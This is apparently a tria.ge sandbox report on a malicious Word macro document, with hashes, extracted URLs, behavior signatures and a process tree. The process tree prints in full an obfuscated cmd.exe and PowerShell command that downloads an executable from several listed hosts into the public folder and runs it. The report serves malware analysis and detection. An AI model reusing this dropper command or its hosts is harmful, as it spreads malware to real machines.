Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29/08/2024, 09:23
Behavioral task
behavioral1
Sample
c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc
-
Size
154KB
-
MD5
c88dd06b1f25fd0fc256ed2d874c6513
-
SHA1
06df3a61cf1ba9f801f0c0e37ea3bc5e11f6a47d
-
SHA256
496f28c45a056ece930233ef9c15f5e227d9939706d8ff9868f8928cfd600149
-
SHA512
b0770e2fe4ecb7adb61cbec8c82a18e6301718294b266ff5a09ec75cfe8c9719da169617efd0f7ca8ae9a176fa1e709e9bfb26deeee6b006c8fac5b4d52aef2d
-
SSDEEP
3072:WgIg4KfNmKdXKDAfCzDSrvFf9kIy1GOsc3Uv6K:WVqNVXKDACzDSrNU4OscEv
Malware Config
Extracted
http://h-g.at/ILM7q/
http://ibchs.com/ah1B/
http://hillmanmaritime.com/hcBm/
http://body4art.de/v0tMR0a/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 3040 2152 Cmd.exe 30 -
Blocklisted process makes network request 2 IoCs
flow pid Process 6 2832 powershell.exe 8 2832 powershell.exe -
pid Process 2832 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 3040 Cmd.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2152 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2832 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2832 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2152 WINWORD.EXE 2152 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2152 wrote to memory of 2812 2152 WINWORD.EXE 31 PID 2152 wrote to memory of 2812 2152 WINWORD.EXE 31 PID 2152 wrote to memory of 2812 2152 WINWORD.EXE 31 PID 2152 wrote to memory of 2812 2152 WINWORD.EXE 31 PID 2152 wrote to memory of 3040 2152 WINWORD.EXE 32 PID 2152 wrote to memory of 3040 2152 WINWORD.EXE 32 PID 2152 wrote to memory of 3040 2152 WINWORD.EXE 32 PID 2152 wrote to memory of 3040 2152 WINWORD.EXE 32 PID 3040 wrote to memory of 2832 3040 Cmd.exe 35 PID 3040 wrote to memory of 2832 3040 Cmd.exe 35 PID 3040 wrote to memory of 2832 3040 Cmd.exe 35 PID 3040 wrote to memory of 2832 3040 Cmd.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2812
-
-
C:\Windows\SysWOW64\Cmd.exeCmd NjWrAVqAJ wtALGSuUvNbSvGOdlJzbwIS RqzaWaYjozknad & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %dzorojvQztjwdsv%=VidHjtjiE&&set %qzOaJjz%=p&&set %DSBvnYXniSDYD%=o^w&&set %hszGzFrskUajIpH%=bbfaFKFMVdGOJ&&set %SSKlzCXiGJEiUo%=!%qzOaJjz%!&&set %JjSFnHnwJAnrDsY%=hNsVRFSAHw&&set %zbFMQii%=e^r&&set %awidvwYlQzbApG%=!%DSBvnYXniSDYD%!&&set %VwYISNiEw%=s&&set %WmnkTzdjbkIiViT%=RbrjCShqoQNtrE&&set %ZcITwJNst%=he&&set %TtwiBlBmU%=ll&&!%SSKlzCXiGJEiUo%!!%awidvwYlQzbApG%!!%zbFMQii%!!%VwYISNiEw%!!%ZcITwJNst%!!%TtwiBlBmU%! "(' &( j4vPSHOMe[4]+j4vPShOme[34]+QjdxQjd) ( (QjdGIUnsQjd'+'+QjdadasdQjd+Qjd Qjd+Qjd= &Qjd+Qjd'+'(SGQjd+QjdxnSGx+SGxeQjd+QjdSGQjd+QjdxQjd+Qjd+SQjd+QjdGxw-objeQjd+QjdcSGx+SGxtSQjd+QjdGQjd+QjdxQjd+Qjd) random;GIUYY'+'U Qjd+Qjd= .(SGxneSGx+SGxwSGQjd+Qj'+'dxQjd+Qjd+SGxQjd+Qjd-obQjd+QjdjeQjd+QjdctSGx) SQjd+Qjdystem.NeQjd+Qjdt.WeQjd+QjdbQjd'+'+Q'+'jdClien'+'tQjd+Q'+'jd;GIQjd+QjdUNSQjd+QjdBQjd+Qjd = GQjd+QjdIUnsadasdQjd+Qjd.Qjd+Qjdnext(1'+'Qjd+Qjd0000, 28'+'213Qjd+Qjd3)Qjd+Qjd'+';GIUADCQjd+QjdXQjd+Qjd Qjd+Qjd= SQjd+QjdGx http:Qjd+Qjd/'+'/grazQjd+Q'+'jdiellacintrQjd+Qjda.com.bQjd+QjdrQjd+Qjd/aQjd+QjdkQjd+QjddQjd+QjdpqQjd+Qjd9Qjd+Qjd6Qjd+Qjd/@httQjd+Qjdp://h-g.at/ILM7q/@Qjd+QjdhtQjd+Qjdtp'+'://Qjd+Qj'+'dibchs.Qjd+Qjdcom/Qjd+Qjdah1B/@htQjd+QjdtpQjd+Qjd:/'+'/hilQjd+QjdlQjd+QjdmanmariQjd+Qjdtime.com/hc'+'BmQjd+Qjd/@Qjd+QjdhttQjd+Qjdp://bodyQjd+Qjd4art.dQjd+Qjde/vQjd+Q'+'jd0tQjd+QjdMR0a/SGx.Qjd+QjdSplit(SQjd+QjdGx@SGQjd+Qjdx)Qjd+Qjd;GQjd+QjdIUS'+'DQjd+QjdC Qjd+Qjd= GQjd+QjdIQjd+QjdUQjd+QjdeQjd+QjdnQjd+Qjdv:Qjd+QjdpuQjd+QjdbQjd+QjdlicQjd+'+'Qjd Qjd+Qjd+Qjd+Qjd SGQjd+Qjdx6SQS'+'Gx + GIQjd+QjdUNSQjd+QjdB + (Qjd+QjdSGxQjd+Qjd.Qjd+QjdexSGx+SGxeSGx);foreaQjd'+'+QjdchQjd+Qjd(GI'+'Uasfc in GIUADCX)Qjd+Qjd{tQjd+QjdrQj'+'d+Qjdy{Qjd+QjdGIQjd+QjdUQjd+QjdYQjd+QjdYU.Qjd+Qjds40DoMmQjd'+'+QjdjWn'+'Qjd+QjdlMmjQjd+QjdOaQjd+QjddFIMmQjd+QjdjQ'+'jd+Qjdles40(GIUasfQjd+QjdcQjd+Qjd.sQjd+Qjd40Qjd+QjdTQjd+QjdoStrMmQjd+QjdjiMmjNgsQjd+Qjd4Qjd+Qjd0(), GQjd+QjdIUS'+'DQjd+Qjd'+'C);&(SGxInvoSGQjd+Qjdx+SQjd+Qjd'+'GxkSQjd+QjdGx+SGxe-IQjd+Qjd'+'temSGx)(GQjd+QjdIUSDC);Qjd+QjdbreQjd+Qjdak;}caQjd+QjdtchQjd+Qjd{}}Qjd).rePlaCe(QjdMmjQjd,QjdpQeQjd).rePlaCe(([cHar]83+[cHa'+'r]71+[cHar]120),[sTRING'+'][cHar]39).rePlaCe(([cHar]115+[cHar]52+[cHar]48),[sTRING][cHar]34).rePlaCe(Q'+'jd6SQQjd,[sTRING][cHar]92).rePlaCe(QjdGIUQjd,[sTRING][cHar]36) ) ').RepLAcE(([ChAr]106+[ChAr]52+[ChAr]118),[STrIng][ChAr]36).RepLAcE(([ChAr]112+[ChAr]81+[ChAr]101),[STrIng][ChAr]96).RepLAcE('Qjd',[STrIng][ChAr]39)|& ( $sHeLLiD[1]+$ShELlId[13]+'x')2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(' &( j4vPSHOMe[4]+j4vPShOme[34]+QjdxQjd) ( (QjdGIUnsQjd'+'+QjdadasdQjd+Qjd Qjd+Qjd= &Qjd+Qjd'+'(SGQjd+QjdxnSGx+SGxeQjd+QjdSGQjd+QjdxQjd+Qjd+SQjd+QjdGxw-objeQjd+QjdcSGx+SGxtSQjd+QjdGQjd+QjdxQjd+Qjd) random;GIUYY'+'U Qjd+Qjd= .(SGxneSGx+SGxwSGQjd+Qj'+'dxQjd+Qjd+SGxQjd+Qjd-obQjd+QjdjeQjd+QjdctSGx) SQjd+Qjdystem.NeQjd+Qjdt.WeQjd+QjdbQjd'+'+Q'+'jdClien'+'tQjd+Q'+'jd;GIQjd+QjdUNSQjd+QjdBQjd+Qjd = GQjd+QjdIUnsadasdQjd+Qjd.Qjd+Qjdnext(1'+'Qjd+Qjd0000, 28'+'213Qjd+Qjd3)Qjd+Qjd'+';GIUADCQjd+QjdXQjd+Qjd Qjd+Qjd= SQjd+QjdGx http:Qjd+Qjd/'+'/grazQjd+Q'+'jdiellacintrQjd+Qjda.com.bQjd+QjdrQjd+Qjd/aQjd+QjdkQjd+QjddQjd+QjdpqQjd+Qjd9Qjd+Qjd6Qjd+Qjd/@httQjd+Qjdp://h-g.at/ILM7q/@Qjd+QjdhtQjd+Qjdtp'+'://Qjd+Qj'+'dibchs.Qjd+Qjdcom/Qjd+Qjdah1B/@htQjd+QjdtpQjd+Qjd:/'+'/hilQjd+QjdlQjd+QjdmanmariQjd+Qjdtime.com/hc'+'BmQjd+Qjd/@Qjd+QjdhttQjd+Qjdp://bodyQjd+Qjd4art.dQjd+Qjde/vQjd+Q'+'jd0tQjd+QjdMR0a/SGx.Qjd+QjdSplit(SQjd+QjdGx@SGQjd+Qjdx)Qjd+Qjd;GQjd+QjdIUS'+'DQjd+QjdC Qjd+Qjd= GQjd+QjdIQjd+QjdUQjd+QjdeQjd+QjdnQjd+Qjdv:Qjd+QjdpuQjd+QjdbQjd+QjdlicQjd+'+'Qjd Qjd+Qjd+Qjd+Qjd SGQjd+Qjdx6SQS'+'Gx + GIQjd+QjdUNSQjd+QjdB + (Qjd+QjdSGxQjd+Qjd.Qjd+QjdexSGx+SGxeSGx);foreaQjd'+'+QjdchQjd+Qjd(GI'+'Uasfc in GIUADCX)Qjd+Qjd{tQjd+QjdrQj'+'d+Qjdy{Qjd+QjdGIQjd+QjdUQjd+QjdYQjd+QjdYU.Qjd+Qjds40DoMmQjd'+'+QjdjWn'+'Qjd+QjdlMmjQjd+QjdOaQjd+QjddFIMmQjd+QjdjQ'+'jd+Qjdles40(GIUasfQjd+QjdcQjd+Qjd.sQjd+Qjd40Qjd+QjdTQjd+QjdoStrMmQjd+QjdjiMmjNgsQjd+Qjd4Qjd+Qjd0(), GQjd+QjdIUS'+'DQjd+Qjd'+'C);&(SGxInvoSGQjd+Qjdx+SQjd+Qjd'+'GxkSQjd+QjdGx+SGxe-IQjd+Qjd'+'temSGx)(GQjd+QjdIUSDC);Qjd+QjdbreQjd+Qjdak;}caQjd+QjdtchQjd+Qjd{}}Qjd).rePlaCe(QjdMmjQjd,QjdpQeQjd).rePlaCe(([cHar]83+[cHa'+'r]71+[cHar]120),[sTRING'+'][cHar]39).rePlaCe(([cHar]115+[cHar]52+[cHar]48),[sTRING][cHar]34).rePlaCe(Q'+'jd6SQQjd,[sTRING][cHar]92).rePlaCe(QjdGIUQjd,[sTRING][cHar]36) ) ').RepLAcE(([ChAr]106+[ChAr]52+[ChAr]118),[STrIng][ChAr]36).RepLAcE(([ChAr]112+[ChAr]81+[ChAr]101),[STrIng][ChAr]96).RepLAcE('Qjd',[STrIng][ChAr]39)|& ( $sHeLLiD[1]+$ShELlId[13]+'x')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2832
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD52db3e9efd299dca1cb5e2491db43bb4a
SHA14f3d792330d63774bf3bfaea14aa4500640c6e2f
SHA2564c62380d7b2d3ada08e1a4a0332664c89373b90a2c5e8d68b34305f41edce6bd
SHA512313c4d5aa0f594b29c7d951fd5b5fa6e748028dab6c8861a74fcb685087c5f3d2cc493d4164957f7ad486ea2301ce8e32d360af6078d8fb47ea8c523b3924846